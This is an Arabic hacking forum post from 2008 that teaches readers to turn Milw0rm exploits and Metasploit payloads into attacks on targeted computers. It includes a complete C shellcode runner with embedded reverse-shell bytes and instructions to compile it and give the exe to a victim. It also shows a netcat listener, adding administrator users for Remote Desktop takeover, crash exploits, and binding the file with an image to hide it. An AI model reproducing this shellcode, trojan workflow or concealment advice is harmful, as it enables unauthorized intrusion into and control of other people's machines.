اخترآق الأجهزة بطرق مختلفه

Mr.InjEctOr · 06-28-2008, 05:44 PM

.:: [ بســم اللهـ الرحمـن الرحيـم ] ::.

السلآم عليكم يآ شبآب ان شآء اللهـ, بخير , المهم اليوم رآح اشرح شرح مبسط

للثغرآت للي تنزل بالـ Milw0rm + الـ ****Sploit

( مجرد شرح بسيط وتوضيح مب كآمل )

موضوعي اليوم يتحدث عن الثغرات الطفح [ OverFlow ] و حجب الخدمة [ Dos/Poc ]

وشرح طريقة الاختراق باستخدام الشيل كود [ Shell code ]

طبعآ يآ شبآب هآي الطرق مآتنفع للاخترآق العشوآئي , بس للاخترآق المستهدف

ولآزم احيانا تحتآج آي بي الشخص المستهدف باي طريقه تجيب الأي بي مب مشكله

وعندك طريقه سحب الأي بي من المسنجر عن طريق سكربت IP GET

والحين نبدآ بتعريف وتوضيح اهم المصطلحآت وبعدين نفصل كل شيء عشآن مآيصير اي

لخبطه بالموضوع

اول شيء نشوف طريقه تقسيم الثغرآت للي تنزل بالـ Milw0rm

نبدآ

الـ Remote

تعتبر من اخطر واقوى انوآع الثغرآت يعني تحكم عن بعد والصرآحة هي من افضل الانوآع واسهلهآ

وهي 0-Day يعني ثغرة مميته وخطيره ويشترط وجود برنآمج بجهآز الضحيه

الـ Local

يعني تطبيق محلي ويختلف شوي عن الريموت

بس يظل الريموت اقوى واحسن

الـ dos/poc

وهي ثغرات حجب الخدمة (denial of service)

وهو احيانا يكون مجرد تهنيق للجهآز

او يسوي له كرآش [ Crash ]

بشرط يكون البرنآمج منصب ع الجهآز

مثلا لو لقيت كرآش في برنآمج PhoTo Shop ونزلت الملف

رآح يصير التهنيق / الكرآش

الـ Shell code

هو كود لبرنآمج ويؤدي لـ / اضافه يوزر / دآونلودر , بآتش / تنفيذ اوآمر الدوس / اتصآل عكسي / اتصآل مبآشر

وحقن ملفآت الـ DLL

وهو يوجد بكل ثغرآت الريموت واللوكل عشآن نقدر نتحكم بالنظآم

وفي اشياء ثانية , بس اكثر الأشياء للي رآح نحتآجهآ هي

Bind Shell = اتصآل مبآشر

Reverse Shell = اتصآل عكسي ( افضل واقوى )

طبعآ يآ شبآب الثغرآت تجي بمختلف لغآت البرمجه وكل ثغرى تكون غير عن ثغرة ثآنية

وطريقه التعرف ع الثغرآت وآضحة جدآ بس رآح نذكرهآ + شرح فيديو لطريقه الترجمه

ومرفقه معهم الادوآت للترجمه

يلا نبدآ

اول شيء الـ pHp ويبدآ كذآ : <?php

والحين هذا هو شرح الفيديو : 4shared.com - online file sharing and storage - download pHp.rar

,

ثآني شيء الـ Perl ويبدآ كذآ : #!/usr/bin/perl

والحين شرح الترجمه : 4shared.com - online file sharing and storage - download Perl.rar

,

ثآلث شيء الـ C++\C ويبدآ كذآ : #include "stdio.h"

شرح الفيديو : 4shared.com - online file sharing and storage - download C,C++.rar

,

رآبع شيء الـ python ويبدآ كذآ : #!/usr/bin/env python

شرح الترجمه : 4shared.com - online file sharing and storage - download Python.rar

,

خآمس شيء الـ Ruby ويبدآ كذآ : #!/usr/bin/ruby

شرح الترجمه : 4shared.com - online file sharing and storage - download RubY.rar

//

والحين نشرح اهم مصطلحآت للشل كود في موقع الـ****Sploit

اول شيء ندش علىآ هآي الرآبط

الرآبط :/ http://****sploit.com:55555/PAYLOADS?FILTER=win32

طبعآ انا مختآر نظآم ويندوز بيئة 32 بت

وهاي هو المستخدم الاكثر وتقتدر تختآر لنظآم الـ Linux اذا حبيت تخترق اجهزة بنظآم ليونكس

المهم تآبعوآ

******s Bind DLL Inject = يعني حقن ملف ربط دينامكي ( اتصآل مبآشر )

\

******s Bind Shell = شل كود وضيفتهآ الأتصآل المبآشر

/

******s Executable Download and Execute = شل كود وضيفتهآ تحميل وتنفيذ كود حلو لمحبين برآمج الأخترآق

\

******s Execute Command = تنفيذ احد اوآمر الدوس , تشغيل الحاسبه او اضافه يوزر للي تبيه بالدوس

/

******s Execute net user /ADD = اضافه يوزر للنظآم ونقدر نسيطر عليه من الـ ReMoTe Desktob

وينفع لاصحآب اخترآق الموآقع اضافه يوزر روت

\

******s Reverse DLL Inject = حقن ملف ربط دينامكي ( اتصآل عكسي )

/

******s Reverse Shell = كود وضيفته الأتصآل العكسي ورآح يكون مستخدم بشكل كبير بالثغرآت لقوته وسيطرته

الكآمله ع النظآم

ورآح يكون الأخترآق عن طريق الـ NeTCaT يعني تسوي تنصت لين يشبك الضحية مع جهآزك

وتتقدر بعد اذا تبي يكون التبليغ ع برنآمج اخترآق

ورآح اشرح كل شيء بفقرة لحآله

//

يلا نبدآ اول شيء بالـ ReMoTe

طبعآ يختلف نوع الثغرة في ثغرآت تكون بصيغه HTML ولآزم الشل كود يكون مشفر بلغه الجآفآ

اما اذا كآنت الثغرة مكتوبه بالسي عآدي نترجم علاطووووول

نختآر اي ثغرة مثلا آخر وحده نزلت : http://www.milw0rm.com/exploits/5827

طبعآ الشل كود يكون جآهز واذا مآعجبك نوع الشل كود تقدر تغيره بشرط الشل كود مآيكون كبير عن للي موجود

بالثغرة ولو كآن اصغر منه عآدي مآفي مشآكل

نبدآ نشرح تفاصيل الثغرة

يعني الثغرة بلغه الـ C

وهني يقولك الشل كود وظيفته الأتصآل المبآشر Bind Shell

ويفتح بورت في الجهآز 9998

وحجم الشل كود 317 بآيت يعني اذا حبيت تغير الشل كود لآزم تجيب وآحد نفس الحجم او اصغر منه

هني يقولك حجم الفيض بالذآكرة 10000 بآيت لاتغيره لانه حجم الثغرة كبير شوي

والحين خلصنآ للي عليك تترجم الثغرة وتطبق الثغرة اذا كنت منصب البرنآمج ورآح تشتغل معآك الثغرة زين

#########################################

الحين نروح لثغرة ثآنية وهي ثغرة ببرنآمج Xchat

وهآي الثغرة لازم تكون صيغتهآ HTML

ولآزم الشل كود يكون مشفر بلغه الجآفآ

نشرح التفاصيل

يعني يقولك بالملاحظة لازم الشل كود ينفذ آمر تشغيل الالحاسبه

ونبدآ ننسخ الثغرة من HTML وتحت ورآح نحصل مكتةب بنص الثغرة

command "Shell calc"

يعني نسوي شل كود ينفذ آمر تشغيل الاحاسبه

ندخل ع الموقع الميتآ : http://****sploit.com:55555/PAYLOADS?FILTER=win32

ونختآر

يعني تنفيذ اوآمر الدوس

ويوم تضغط ع الرآبط رآح يجيك كذآ

في المربع الاول كتب آمر الدوس وهو تشغيل الالحاسبه

والامر الثاني خله زي مآهو لاتغيره

وآخر شيء اضغط تكوين

وبعد مآنضغط تكوين رآح يطلع لنآ الشل كود لتشغيل الالحاسبه

الحين كل شيء وآضح ننسخ الشل كود ونحطه بالثغرة .. بس قبل كل شيء

احنآ قلنآ الثغرة مكتوبه بالـ HTML

يعني مآينفع نحط شل كود مكتوب بالسي ولآزم نحول الشل كود من السي الى الجآفآ عن طريق هآي الأدآة

المكتوبه بالبيرل ( من طرح الأخ العزيز بروتو مآن )

لآحظ معآي الادآة يوم فتحته بالمفكرة

موجود دآخلهآ شل كود ولآزم نستبدل الشل كود الموجود بالادآة للي كونآه قبل شوي

الحين ننسخ الشل كود للي سوينآه ونحطه بالادآه عشآن يحول لنآ الي لغه الجآفآ عشآن المتصفح يقدر يشغله

هذآ هو ننسخه

ونحطه بالادآة

وبعد مآحطينآه نحفظ الشغل كله ونحط الادآة بالسي ونترجمهآ

على مأظن كل شيء وضح الحين شغلنآ الأدآة وشفر لنآ الشل كود الى الجآفآ والحين نحط هآي الكود

بالثغرة ونجرب نشغله ورآح يشتغل باذن الله

واما الأدآة للي تحول الشل كود للجآفآ حملهآ من هآي الرآبط

الرآبط :/ 4shared.com - online file sharing and storage - download code.rar

#######################################

الحين خلصنآ من ثغرآت الريموت وتكون اغلبهآ زي كذآ

واللولكل تقريبا زي الريموت ويختلف في شويه اشياء والفرق مب كبير

والحين ثغرآت حجب الخدمه الـ dos/poc

وهي ثغرآت مآتخليك تخترق الجهآز يعني زي مآوضحنآ قبل مجرد تهنيق او كرآش

للجهآز ومآيكون بصيغه exe

مثال هآي الثغرة

http://www.milw0rm.com/exploits/5918

الكرآش في برنآمج uTorrent

وهي مكتوبه بلغه البيرل ننسخهآ في المفكرة ونحول الصيغه الي .pl

وونقل الملف للـ c

ونترجمه ورآح يطلع لنآ زي كذآ

نكتب الأي بي وبعدين البورت وبعدين اليوزر + البآس

ورآح تشتغل وفي اكثر من طريقه

في ثغرآت بمجرد انك تعطي ملف للضحية يبدآ جهآزه يعلق ويصير له بطأ شديد

#######################################

الحين ننتقل لاحسن شيء بالموضوع الـ Shell code

ورآح اذكر كيف تخترق بدون ثغرآت يعني بس تحتآج لشل كود خآص فيك واخترق

ولا رآح نستخدم لا ثغرى ريموت ولآ شيء

الحين روح للميتآ كالعاده كآنك تسوي شل كود والحين اختآر

Reverse Shell = اتصآل عكسي

ورآح يجيك زي كذآ تآبع

في المربع الأول اكتب آي بي جهآزك

واكتب المنفذ المفتوح عندك والحين

اضغط على تكوين

وبعد مآتضغط على تكوين انسخ الشل كود

[IMG]http://up5.m5zn.com/photos/00044/kc***r1w2ctb.jpg[/IMG]

وحطه بين هآي الكود

كود:

#include <stdio.h>
char shellcode[]=
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf3"
"\x75\x47\x94\x83\xeb\xfc\xe2\xf4\x0f\x9d\x03\x94\xf3\x75\xcc\xd1"
"\xcf\xfe\x3b\x91\x8b\x74\xa8\x1f\xbc\x6d\xcc\xcb\xd3\x74\xac\xdd"
"\x78\x41\xcc\x95\x1d\x44\x87\x0d\x5f\xf1\x87\xe0\xf4\xb4\x8d\x99"
"\xf2\xb7\xac\x60\xc8\x21\x63\x90\x86\x90\xcc\xcb\xd7\x74\xac\xf2"
"\x78\x79\x0c\x1f\xac\x69\x46\x7f\x78\x69\xcc\x95\x18\xfc\x1b\xb0"
"\xf7\xb6\x76\x54\x97\xfe\x07\xa4\x76\xb5\x3f\x98\x78\x35\x4b\x1f"
"\x83\x69\xea\x1f\x9b\x7d\xac\x9d\x78\xf5\xf7\x94\xf3\x75\xcc\xfc"
"\xcf\x2a\x76\x62\x93\x23\xce\x6c\x70\xb5\x3c\xc4\x9b\x85\xcd\x90"
"\xac\x1d\xdf\x6a\x79\x7b\x10\x6b\x14\x16\x26\xf8\x90\x5b\x22\xec"
"\x96\x75\x47\x94";


main()
{
void (*routine) ();
(long) routine = &shellcode;
routine();
}

بدل الشل كود للي موجود بالادآة بالشل كود للي سوينآه الحين

وبعدين احفظ الملف بآمتدآد .c

والحين ننترجم الادآة , وانا نزلت درس كيف نترجم الثغرآت الادوآت

بعد الترجمه رآح يكون الأمتدآد exe

عطه الملف اي وآحد وسوي تنصت للنت كت

ع البورت للي حطيته يوم سويت الشل كود وانا اخترت بورت 3460

للي هو بورت البيوزن مب مهم انت اختآر اي بورت ينآسبك

تآبع

نسوي تنصت نفس مآقلنآ ع البورت للي حددنآه عن طريق هآي الأمر

كود PHP:


			
-v -l -p

ونتكب بعد الـ p

البورت

وبعد مآشغلت الشل كود المترجم

اتصل مع جهآزي ورآح يكون كذآ

والحين نفذ اوآمر الدوس على رآحتك وتقتدر تضيف يوزر او تغير بآس الأدمن عشآن نتحكم يجهآز الضحية

عن طريق الـ Remote Desktop

وللي مآفهم الشرح الشل كود يحمل الشرح فيديو من هآي الرآبط

الرآبط :/ 4shared.com - online file sharing and storage - download Shell code.rar

واما ادآة النت كت معظمكم عنده وهو موجود مع برنآمج الـميتآ سبلويت

#############################################

والحين ننتقل لخيآر ******s Execute net user /ADD

ويعني اضافه يوزر للنظآم وحتى اصحآب اخترآق الموآقع يقدرون بستفيدون منهآ

المهم

والحين بعد مآتضغط سوي زي مآهو موضح

في المربع الأول البآس ورد لليوزر

والثآني اسم اليوزر

وحطه بالادآة للي حطيانه للاتصآل العكسي وترجم الثغرة

وبعدين عطه لاي وآحد

واذا الضحية شغل الملف رآح ينضآف يوزر جديد للجهآز ونقدر نستفيد عن طريق التحكم عن بعد

Remote Desktop

نحط آي بي ضحيتنآ وبعدين نتكب اليوزر للي انضآف للنظآم وبعدين البآس

ورآح يدش معآك وتمتع تحكم كآمل للضحية

شرح الفيديو من هآي الرآبط

الرآبط : / ADD USER.rar

او : 4shared.com - online file sharing and storage - download ADD USER.rar

في الأخير عشآن شاشه الدوس مآتطلع لك

ادمج الملف مع برنآمج صورة اي شيء تبيه او اضغط الملف باي اداه ضغط

وان شآء الله تختفي الشاشه

\\ : وفي بالي طريقه تغليم الصفحآت بدون ثغرآت بس شل كود مشفر بالجافا :lol:

يلآ شبآب اذا في خطآ بلغوني والانسآن مب معصوم عن الخطأ واذا في شيء مب وآضح قلولي عليه

يلآ فمآن اللهـ,

تحميل الشرح مع الصور بصيغة html